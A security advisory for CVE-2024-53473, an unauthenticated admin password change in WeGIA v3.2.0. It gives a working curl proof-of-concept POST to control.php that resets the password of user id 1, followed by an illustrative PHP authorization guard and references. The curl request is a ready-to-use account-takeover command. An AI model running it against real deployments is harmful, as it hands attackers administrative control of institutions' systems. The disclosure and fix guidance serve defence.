CVE-2024-53473: Broken Access Control

Vendor

WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions.

Affected Product Code Base

WeGIA - v3.2.0

Vulnerability Description

A critical vulnerability was identified in the WeGIA web application. It allows an attacker to change the password of the admin user by sending a POST request to the control.php endpoint, with no authentication or authorization required.

POC

Curl Request:

curl -X POST https://demo.wegia.org/controle/control.php \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Origin: https://demo.wegia.org" \
  --data-raw "nova_senha=1234567&confirmar_senha=1234567&nomeClasse=FuncionarioControle&metodo=alterarSenha&redir=logout.php&id_pessoa=1&alterar=Alterar"
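
The request above succeeds because nothing checks who is calling before the class and method named in the body are invoked. The following guard is an added example, not WeGIA's code or its actual fix: it shows the three checks such a dispatcher needs before acting on nomeClasse, metodo and id_pessoa. The session keys `usuario`, `id_pessoa` and `is_admin`, the allow-list contents and the function name are assumptions.

```php
<?php
// Added example, not WeGIA code. Session keys 'usuario', 'id_pessoa' and
// 'is_admin', and the allow-list contents, are assumptions for illustration.
declare(strict_types=1);

// Only class/method pairs listed here may be dispatched from a request.
const ALLOWED_ACTIONS = [
    'FuncionarioControle' => ['alterarSenha'],
];

/**
 * Decide whether a control.php-style request may be dispatched.
 * Returns an HTTP status: 200 to proceed, 400/401/403 to refuse.
 */
function authorizeRequest(array $session, array $post): int
{
    // 1. Authentication: no logged-in session, no dispatch.
    if (empty($session['usuario']) || !isset($session['id_pessoa'])) {
        return 401;
    }
    // 2. Allow-list: never invoke an arbitrary class/method taken from input.
    $class  = (string)($post['nomeClasse'] ?? '');
    $method = (string)($post['metodo'] ?? '');
    if (!in_array($method, ALLOWED_ACTIONS[$class] ?? [], true)) {
        return 400;
    }
    // 3. Authorization: the target id must be the caller's own id,
    //    unless the session belongs to an administrator.
    $target = filter_var($post['id_pessoa'] ?? null, FILTER_VALIDATE_INT);
    if ($target === false) {
        return 400;
    }
    if ($target !== (int)$session['id_pessoa'] && empty($session['is_admin'])) {
        return 403;
    }
    return 200;
}

// Constructed inputs: the advisory's request body, first with no session,
// then with a session for a different person, then with the owner's session.
$post = ['nomeClasse' => 'FuncionarioControle', 'metodo' => 'alterarSenha', 'id_pessoa' => '1'];
var_dump(authorizeRequest([], $post));
var_dump(authorizeRequest(['usuario' => 'u', 'id_pessoa' => 7], $post));
var_dump(authorizeRequest(['usuario' => 'u', 'id_pessoa' => 1], $post));
```

The request in the PoC carries only the new password and its confirmation, so a password-change handler behind this guard should also require the current password and a CSRF token.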

Reference

https://github.com/nilsonLazarin/WeGIA/issues/791

https://www.wegia.org

https://github.com/nilsonmori/WeGIA

Discoverer

Natan Maia Morette and Diego Cardoso Borda Castro, Nov 2024.